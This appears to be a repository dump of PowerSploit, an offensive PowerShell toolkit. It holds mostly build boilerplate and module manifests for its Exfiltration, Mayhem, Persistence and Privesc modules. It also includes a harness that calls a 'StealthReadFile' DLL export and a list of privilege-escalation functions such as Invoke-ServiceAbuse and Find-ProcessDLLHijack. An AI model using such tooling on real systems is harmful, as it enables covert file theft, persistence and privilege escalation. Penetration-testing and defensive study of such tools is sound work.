2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : logon Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this logon DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your logon application.
9 |
10 |
11 | logon.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | logon.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | logon.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named logon.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
25 | using namespace std;
26 |
27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 |
29 | int _tmain(int argc, _TCHAR* argv[])
30 | {
31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile");
33 |
34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress;
35 |
36 | DWORD buffSize = 1024*1024;
37 | BYTE* buffer = new BYTE[buffSize];
38 | DWORD bytesRead = 0;
39 | ULONGLONG bytesLeft = 0;
40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);
41 |
42 | cout << "Return value: " << ret << endl;
43 |
44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
45 | myFile.write((char*)buffer, bytesRead);
46 |
47 | return 0;
48 | }
49 |
50 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParserDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParserDLL application.
9 |
10 |
11 | NTFSParserDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParserDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParserDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
21 | BOOL APIENTRY DllMain( HMODULE hModule,
22 | DWORD ul_reason_for_call,
23 | LPVOID lpReserved
24 | )
25 | {
26 | switch (ul_reason_for_call)
27 | {
28 | case DLL_PROCESS_ATTACH:
29 | case DLL_THREAD_ATTACH:
30 | case DLL_THREAD_DETACH:
31 | case DLL_PROCESS_DETACH:
32 | break;
33 | }
34 | return TRUE;
35 | }
36 |
37 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Exfiltration`
7 |
8 | To see the commands imported, type `Get-Command -Module Exfiltration`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | PowerSploit is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2012, Matthew Graeber
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Mayhem/Mayhem.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Mayhem.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Mayhem Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/Mayhem/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Mayhem`
7 |
8 | To see the commands imported, type `Get-Command -Module Mayhem`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Persistence/Persistence.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Persistence.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Persistence Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/Persistence/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module Persistence`
7 |
8 | To see the commands imported, type `Get-Command -Module Persistence`
9 |
10 | For help on each individual command, Get-Help is your friend.
--------------------------------------------------------------------------------
/PowerSploit.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and !('Tests','docs' -contains $_.Name) } | % { Import-Module $_.FullName -DisableNameChecking }
2 |
--------------------------------------------------------------------------------
/PowerSploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.23107.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU
15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU
16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Privesc.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'
11 |
12 | # Author of this module
13 | Author = 'Will Schroeder (@harmj0y)'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Privesc Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = @(
26 | 'Get-ModifiablePath',
27 | 'Get-ProcessTokenGroup',
28 | 'Get-ProcessTokenPrivilege',
29 | 'Enable-Privilege',
30 | 'Add-ServiceDacl',
31 | 'Set-ServiceBinaryPath',
32 | 'Test-ServiceDaclPermission',
33 | 'Get-UnquotedService',
34 | 'Get-ModifiableServiceFile',
35 | 'Get-ModifiableService',
36 | 'Get-ServiceDetail',
37 | 'Invoke-ServiceAbuse',
38 | 'Write-ServiceBinary',
39 | 'Install-ServiceBinary',
40 | 'Restore-ServiceBinary',
41 | 'Find-ProcessDLLHijack',
42 | 'Find-PathDLLHijack',
